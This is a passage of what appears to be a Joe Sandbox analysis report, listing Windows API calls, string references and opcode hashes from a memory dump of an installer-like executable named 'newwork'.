                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu
                                                                                        • String ID:
                                                                                        • API String ID: 3711407533-0
                                                                                        • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                        • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                        • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                        • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$CallMessageProcSendTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 601730667-0
                                                                                        • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                        • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                        • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                        • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042311E
                                                                                        • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceEnumFontsRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2698912916-0
                                                                                        • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                        • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                        • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                        • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 730355536-0
                                                                                        • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                        • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                        • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                        • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                        APIs
                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                        • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                        Strings
                                                                                        • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                        • NumRecs range exceeded, xrefs: 0045C396
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlush
                                                                                        • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                        • API String ID: 3593489403-659731555
                                                                                        • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                        • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                        • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                        • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                        APIs
                                                                                          • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                          • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                          • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                          • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                          • Part of subcall function 004063C4: 6F551CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                          • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                          • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                          • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                          • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                          • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                          • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                          • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                          • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                          • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                          • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                          • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                          • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                          • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                          • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                          • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                          • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                        • String ID: Setup
                                                                                        • API String ID: 3870281231-3839654196
                                                                                        • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                        • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                        • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                        • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: $=H
                                                                                        • API String ID: 3660427363-3538597426
                                                                                        • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                        • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                        • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                        • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: .tmp
                                                                                        • API String ID: 1375471231-2986845003
                                                                                        • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                        • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                        • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                        • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                        APIs
                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                          • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                          • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                        • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                        • API String ID: 3869789854-2936008475
                                                                                        • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                        • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                        • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                        • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: RegisteredOrganization$RegisteredOwner
                                                                                        • API String ID: 3535843008-1113070880
                                                                                        • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                        • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                        • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                        • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorFileHandleLast
                                                                                        • String ID: CreateFile
                                                                                        • API String ID: 2528220319-823142352
                                                                                        • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                        • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                        • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                        • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                        • API String ID: 71445658-2565060666
                                                                                        • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                        • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                        • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                        • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                        APIs
                                                                                          • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                        • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                        • API String ID: 2906209438-2320870614
                                                                                        • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                        • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                        • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                        • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                        APIs
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLibraryLoadModeProc
                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                        • API String ID: 2492108670-2683653824
                                                                                        • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                        • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                        • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                        • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                        APIs
                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                        • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                        • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                        • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                        APIs
                                                                                        • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                        Similarity
                                                                                        • API ID: Menu$Append$System
                                                                                        • String ID:
                                                                                        • API String ID: 1489644407-0
                                                                                        • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                        • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                        • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                        • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
• TranslateMessage.USER32(?), ref: 0042448F
• DispatchMessageA.USER32(?), ref: 00424499
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
• Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
• Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
• Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
APIs
• SetPropA.USER32(00000000,00000000), ref: 0041666A
• SetPropA.USER32(00000000,00000000), ref: 0041667F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
• Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
• Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
• Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
• Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
APIs
• IsWindowVisible.USER32(?), ref: 0041EE64
• IsWindowEnabled.USER32(?), ref: 0041EE6E
• EnableWindow.USER32(?,00000000), ref: 0041EE94
Memory Dump Source
